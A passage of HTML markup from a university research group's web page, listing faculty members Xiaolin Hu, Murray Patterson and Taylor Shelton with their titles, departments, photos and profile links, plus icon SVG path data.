20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 